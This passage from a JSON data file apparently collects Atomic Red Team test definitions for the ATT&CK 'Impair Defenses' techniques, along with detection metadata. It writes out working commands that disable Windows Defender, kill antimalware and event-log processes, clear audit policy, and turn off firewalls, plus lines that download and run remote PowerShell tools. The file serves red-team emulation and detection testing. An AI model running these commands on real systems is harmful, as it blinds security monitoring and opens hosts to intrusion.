{cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"start WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Kill antimalware protected processes using Backstab", + "auto_generated_guid": "24a12b91-05a7-4deb-8d7f-035fa98591bc", + "description": "Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.\nhttps://github.com/Yaxser/Backstab", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_name": { + "description": "Name of the protected process you want to kill/terminate.", + "type": "string", + "default": "MsMpEng.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Backstab64.exe should exist in %temp%", + "prereq_command": "if (Test-Path $env:temp\\Backstab64.exe) {exit 0} else {exit 1}", + "get_prereq_command": "Start-BitsTransfer -Source \"https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe\" -Destination \"$env:temp\\Backstab64.exe\" -dynamic" + } + ], + "executor": { + "command": "& $env:temp\\Backstab64.exe -k -n #{process_name}", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "WinPwn - Kill the event log services for stealth", + "auto_generated_guid": "7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66", + "description": "Kill the event log services for stealth via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive ", + "name": "powershell" + } + } + ] + }, + { + "id": "3864fd22-5c63-41c9-bdbc-a66b5ffa3f5e", + "name": "Bypass ExecutionPolicy", + "description": "Ensure the ExecutionPolicy is turned to Bypass", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1562.001", + "name": "Impair Defenses: Disable or Modify Tools" + }, + "platforms": { + "windows": { + "psh": { + "command": "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")" + } + } + } + }, + { + "id": "49470433-30ce-4714-a44b-bea9dbbeca9a", + "name": "Disable Windows Defender Real-Time Protection", + "description": "Disable Windows Defender Real-Time Protection", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1562.001", + "name": "Impair Defenses: Disable or Modify Tools" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh": { + "command": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", + "cleanup": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) { Set-MPPreference -DisableRealtimeMonitoring 0; } else { $service = Get-Service WinDefend -ErrorAction SilentlyContinue; if ($service) { Start-Service WinDefend; } else { echo \"Windows Defender service not found.\"; exit 1; }; };" + } + } + } + }, + { + "id": "b007f6e8-4a87-4440-8888-29ceab047d9b", + "name": "Disable Windows Defender All", + "description": "Disable Windows Defender All", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1562.001", + "name": "Impair Defenses: Disable or Modify Tools" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh": { + "command": "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n", + "cleanup": "Set-MpPreference -DisableIntrusionPreventionSystem $false;\nSet-MpPreference -DisableIOAVProtection $false;\nSet-MpPreference -DisableRealtimeMonitoring $false;\nSet-MpPreference -DisableScriptScanning $false;\nSet-MpPreference -EnableControlledFolderAccess Enabled;\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process termination", + "description": "A process was terminated.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "process" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + null + ] + }, + { + "technique_id": "T1562.002", + "command_list": [ + "C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"Default Web Site\" /section:httplogging /dontLog:true\n", + "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\n$url = \"https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1\"\n$output = \"$env:TEMP\\Invoke-Phant0m.ps1\"\n$wc = New-Object System.Net.WebClient\n$wc.DownloadFile($url, $output)\ncd $env:TEMP\nImport-Module .\\Invoke-Phant0m.ps1\nInvoke-Phant0m\n", + "auditpol /set /category:\"Account Logon\" /success:disable /failure:disable\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\nauditpol /set /category:\"Detailed Tracking\" /success:disable\n", + "auditpol /clear /y\nauditpol /remove /allusers\n", + "wevtutil sl \"Microsoft-Windows-IKE/Operational\" /e:false\n", + "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\n" + ], + "commands": [ + { + "command": "C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"Default Web Site\" /section:httplogging /dontLog:true\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\n$url = \"https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1\"\n$output = \"$env:TEMP\\Invoke-Phant0m.ps1\"\n$wc = New-Object System.Net.WebClient\n$wc.DownloadFile($url, $output)\ncd $env:TEMP\nImport-Module .\\Invoke-Phant0m.ps1\nInvoke-Phant0m\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "auditpol /set /category:\"Account Logon\" /success:disable /failure:disable\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\nauditpol /set /category:\"Detailed Tracking\" /success:disable\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "auditpol /clear /y\nauditpol /remove /allusers\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "wevtutil sl \"Microsoft-Windows-IKE/Operational\" /e:false\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.002", + "display_name": "Impair Defenses: Disable Windows Event Logging", + "atomic_tests": [ + { + "name": "Disable Windows IIS HTTP Logging", + "auto_generated_guid": "69435dcf-c66f-4ec0-a8b1-82beb76b34db", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).\nThis action requires HTTP logging configurations in IIS to be unlocked.\n\nUse the cleanup commands to restore some default auditpol settings (your original settings will be lost)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "website_name": { + "description": "The name of the website on a server", + "type": "String", + "default": "Default Web Site" + } + }, + "executor": { + "command": "C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:true\n", + "cleanup_command": "if(Test-Path \"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"){\n C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:false *>$null\n}\n", + "name": "powershell" + } + }, + { + "name": "Kill Event Log Service Threads", + "auto_generated_guid": "41ac52ba-5d5e-40c0-b267-573ed90489bd", + "description": "Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\n$url = \"https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1\"\n$output = \"$env:TEMP\\Invoke-Phant0m.ps1\"\n$wc = New-Object System.Net.WebClient\n$wc.DownloadFile($url, $output)\ncd $env:TEMP\nImport-Module .\\Invoke-Phant0m.ps1\nInvoke-Phant0m\n", + "cleanup_command": "Write-Host \"NEED TO Restart-Computer TO ENSURE LOGGING RETURNS\" -fore red\nRemove-Item \"$env:TEMP\\Invoke-Phant0m.ps1\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Impair Windows Audit Log Policy", + "auto_generated_guid": "5102a3a7-e2d7-4129-9e45-f483f2e0eea8", + "description": "Disables the windows audit policy to prevent key host based telemetry being written into the event logs.\n[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "auditpol /set /category:\"Account Logon\" /success:disable /failure:disable\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\nauditpol /set /category:\"Detailed Tracking\" /success:disable\n", + "cleanup_command": "auditpol /set /category:\"Account Logon\" /success:enable /failure:enable\nauditpol /set /category:\"Detailed Tracking\" /success:enable\nauditpol /set /category:\"Logon/Logoff\" /success:enable /failure:enable\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Clear Windows Audit Policy Config", + "auto_generated_guid": "913c0e4e-4b37-4b78-ad0b-90e7b25010f6", + "description": "Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "auditpol /clear /y\nauditpol /remove /allusers\n", + "cleanup_command": "auditpol /set /category:\"Account Logon\" /success:enable /failure:enable\nauditpol /set /category:\"Detailed Tracking\" /success:enable\nauditpol /set /category:\"Logon/Logoff\" /success:enable /failure:enable\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Disable Event Logging with wevtutil", + "auto_generated_guid": "b26a3340-dad7-4360-9176-706269c74103", + "description": "Wevtutil can be used to disable logs. \nNOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "log_name": { + "description": "Name of the log to be disabled", + "type": "String", + "default": "Microsoft-Windows-IKE/Operational" + } + }, + "executor": { + "command": "wevtutil sl \"#{log_name}\" /e:false\n", + "cleanup_command": "wevtutil sl \"#{log_name}\" /e:true\n", + "name": "command_prompt" + } + }, + { + "name": "Makes Eventlog blind with Phant0m", + "auto_generated_guid": "3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741", + "description": "Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "exe version of Phant0m", + "type": "Path", + "default": "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Phant0m.exe must exist on disk at specified location (#{file_name})\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe\" -OutFile \"#{file_name}\" -UseBasicParsing\n" + } + ], + "executor": { + "command": "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\n", + "cleanup_command": "echo \"Sorry you have to reboot\"\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1562.003", + "command_list": [ + "export HISTCONTROL=ignoreboth\nwhoami\n" + ], + "commands": [ + { + "command": "export HISTCONTROL=ignoreboth\nwhoami\n", + "source": "atomics/T1562.003/T1562.003.yaml", + "name": "Atomic Red Team Test - Impair Defenses: HISTCONTROL" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.003", + "display_name": "Impair Defenses: HISTCONTROL", + "atomic_tests": [ + { + "name": "Disable history collection", + "auto_generated_guid": "4eafdb45-0f79-4d66-aa86-a3e2c08791f5", + "description": "Disables history collection in shells\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "evil_command": { + "description": "Command to run after shell history collection is disabled", + "type": "String", + "default": "whoami" + } + }, + "executor": { + "command": "export HISTCONTROL=ignoreboth\n#{evil_command}\n", + "name": "sh" + } + }, + { + "name": "Mac HISTCONTROL", + "auto_generated_guid": "468566d5-83e5-40c1-b338-511e1659628d", + "description": "The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history \nand commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile \nso that it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "steps": "1. export HISTCONTROL=ignoreboth\n2. echo export \"HISTCONTROL=ignoreboth\" >> ~/.bash_profile\n3. ls\n4. whoami > recon.txt\n", + "name": "manual" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1562.004", + "command_list": [ + "netsh advfirewall set currentprofile state off\n", + "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v \"EnableFirewall\" /t REG_DWORD /d 0 /f\n", + "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\nnetsh advfirewall firewall set rule group=\"file and printer sharing\" new enable=Yes\n", + "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450 \n", + null, + "Copy-Item PathToAtomicsFolder\\T1562.004\\bin\\AtomicTest.exe -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", + "ufw disable\n", + "systemctl stop ufw\n", + "ufw logging off\n", + "ufw prepend deny from 1.2.3.4\nufw status numbered\n", + "echo \"# THIS IS A COMMENT\" >> /etc/ufw/user.rules\ngrep \"# THIS IS A COMMENT\" /etc/ufw/user.rules\n", + "echo \"# THIS IS A COMMENT\" >> /etc/ufw/ufw.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/ufw.conf\n", + "echo \"# THIS IS A COMMENT\" >> /etc/ufw/sysctl.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/sysctl.conf\n", + "echo \"# THIS IS A COMMENT\" >> /etc/default/ufw\ngrep \"# THIS IS A COMMENT\" /etc/default/ufw\n", + "tail /var/log/ufw.log\n" + ], + "commands": [ + { + "command": "netsh advfirewall set currentprofile state off\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v \"EnableFirewall\" /t REG_DWORD /d 0 /f\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\nnetsh advfirewall firewall set rule group=\"file and printer sharing\" new enable=Yes\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450 \n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": null, + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "Copy-Item PathToAtomicsFolder\\T1562.004\\bin\\AtomicTest.exe -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "ufw disable\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "systemctl stop ufw\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "ufw logging off\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "ufw prepend deny from 1.2.3.4\nufw status numbered\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/user.rules\ngrep \"# THIS IS A COMMENT\" /etc/ufw/user.rules\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/ufw.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/ufw.conf\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/sysctl.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/sysctl.conf\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "echo \"# THIS IS A COMMENT\" >> /etc/default/ufw\ngrep \"# THIS IS A COMMENT\" /etc/default/ufw\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "tail /var/log/ufw.log\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.004", + "display_name": "Impair Defenses: Disable or Modify System Firewall", + "atomic_tests": [ + { + "name": "Disable Microsoft Defender Firewall", + "auto_generated_guid": "88d05800-a5e4-407e-9b53-ece4174f197f", + "description": "Disables the Microsoft Defender Firewall for the current profile.\nCaution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh advfirewall set currentprofile state off\n", + "cleanup_command": "netsh advfirewall set currentprofile state on >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Disable Microsoft Defender Firewall via Registry", + "auto_generated_guid": "afedc8c4-038c-4d82-b3e5-623a95f8a612", + "description": "Disables the Microsoft Defender Firewall for the public profile via registry\nCaution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v \"EnableFirewall\" /t REG_DWORD /d 0 /f\n", + "cleanup_command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v \"EnableFirewall\" /t REG_DWORD /d 1 /f\n", + "name": "command_prompt" + } + }, + { + "name": "Allow SMB and RDP on Microsoft Defender Firewall", + "auto_generated_guid": "d9841bf8-f161-4c73-81e9-fd773a5ff8c1", + "description": "Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.\nCaution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\nnetsh advfirewall firewall set rule group=\"file and printer sharing\" new enable=Yes\n", + "cleanup_command": "netsh advfirewall reset >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Opening ports for proxy - HARDRAIN", + "auto_generated_guid": "15e57006-79dd-46df-9bf9-31bc24fb5a80", + "description": "This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.\n\nreference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450 \n", + "cleanup_command": "netsh advfirewall firewall delete rule name=\"atomic testing\" protocol=TCP localport=450 >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Open a local port through Windows Firewall to any profile", + "auto_generated_guid": "9636dd6e-7599-40d2-8eee-ac16434f35ed", + "description": "This test will attempt to open a local port defined by input arguments to any profile", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "local_port": { + "description": "This is the local port you wish to test opening", + "type": "Integer", + "default": 3389 + } + }, + "executor": { + "command": "netsh 